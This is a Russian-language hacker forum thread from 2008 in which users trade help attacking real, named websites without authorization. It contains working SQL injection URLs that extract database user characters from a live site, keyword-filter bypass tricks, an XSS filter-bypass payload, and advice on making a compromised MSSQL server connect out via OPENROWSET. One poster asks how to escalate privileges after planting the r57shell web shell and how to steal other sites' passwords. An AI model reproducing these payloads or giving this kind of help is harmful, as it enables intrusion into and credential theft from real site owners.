Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Ershik
    тебе сюда:
    https://forum.antichat.ru/thread50550-Microsoft+Access.html
     
  2. Pozer

    Pozer New Member

    Joined:
    3 Nov 2008
    Messages:
    11
    Likes Received:
    3
    Reputations:
    -5
    Есть сплоит Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
    Так вот, он ворует хеш, но на сколько мне известно в Invision Power Board 2.x.x алгоритм такой:
    Значит нужна соль, сплоит её не ворует, где же её взять?
     
  3. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Еще вопрс, что означает эта уязвимость? Как ей можно воспользоваться?
    http://www.campustore.it/ita/viewpage.aspx?ID=431'
     
  4. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    час ночи и мозг отказывается работать. раскрутит кто? с результатами желательно в пм (-
    http://www.zahar.de/bigmir/forum/showprofil.php?id=1'
     
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Calcutta
    4 ветка... дальше с выводом проблемы )
     
  6. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Да как бы проблем особо нету=) КРоме того что долго это все...
    1) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring(user(),1,1))+limit+1,1 - первый символ 85
    2) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring(user(),2,1))+limit+1,1 - второй символ 55
    И т.д. погнали
     
  7. Sindicat

    Sindicat New Member

    Joined:
    14 Nov 2008
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Видишь ли в чём дело, надо быть очень криворуким кодером, чтобы поставить фильтрацию на AND, char и select, и при этом оставить скуль в параметре id :)

    100% ты что-то делаешь неправильно. линк кинь посмотрим
     
    1 person likes this.
  9. none222

    none222 Guest

    Reputations:
    0
    на самом деле бывает и такое
     
  10. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    Попробуй заменит and на &&, а select на seLEct или sel/*lala*/ect
     
  11. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    Это MsAccess.
    Code:
    http://forum.antichat.ru/thread50550-msaccess.html
     
  12. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    Помоему так:
     
  13. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Вопрос:
    Имею доступ к MSSQL серверу с правами dbo, через баг в asp скрипте. Можно ли открыть порт 1433 для удаленного коннекта (к примеру через sp_configure)? Firewall отсутствует. Если можно, то каким образом.
    Спасибо
     
    #3693 SHS, 18 Nov 2008
    Last edited: 18 Nov 2008
  14. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -1
    Люди помогите плиз, я новичек в этом деле, поэтому всех фишек не знаю. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель. Заранее спасибо
     
  15. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.prodayka.ru/search.php?do_search=Search&searchword=%22%>+javasc<script<>ript:alert(a)

    фильтрация стоит, но в принципе обходимая. вписать можно что угодно, просто показал пример обхода фильтрации.
    можно как либо использовать подобное?
     
  16. Sindicat

    Sindicat New Member

    Joined:
    14 Nov 2008
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    Я тот сайт потерял не могу вам показать, но есть другой вот например с этим можна что - то сделать ? http://myua.com.ua/index.php?l=2&o=96 ключевые слова тож фильтруются

    Выбрал случайный сайт просто чем сложнее тем интиресний взломать
     
  17. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    ребятки, не могу найти на ачате инфу про фильтрацию слов.
    какие могут быть возможные методы обхода фильтрации целых слов?.
     
  18. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    к сожалению, как настроить mssql сервер для разрешения удаленных подключений сказать не могу, но можно поступить обратным образом, т.е. заставить mssql подключиться к твоему серверу с помощью OPENROWSET и OPENDATASOURCE. По данной теме есть хорошая статья на секлабе:
    http://www.securitylab.ru/analytics/216396.php
     
  19. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    <scri<script>pt> , как вариант, если ты это имеешь в виду.
     
  20. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    ох фак, не написал. я имел в виду скуль. есть скуль, но без объединения запросов мне придется втыкать вслепую :( конкретно на сайте в запросе недопускается "union". post'ом не хавает :(
     
    #3700 .acme, 18 Nov 2008
    Last edited: 18 Nov 2008
Thread Status:
Not open for further replies.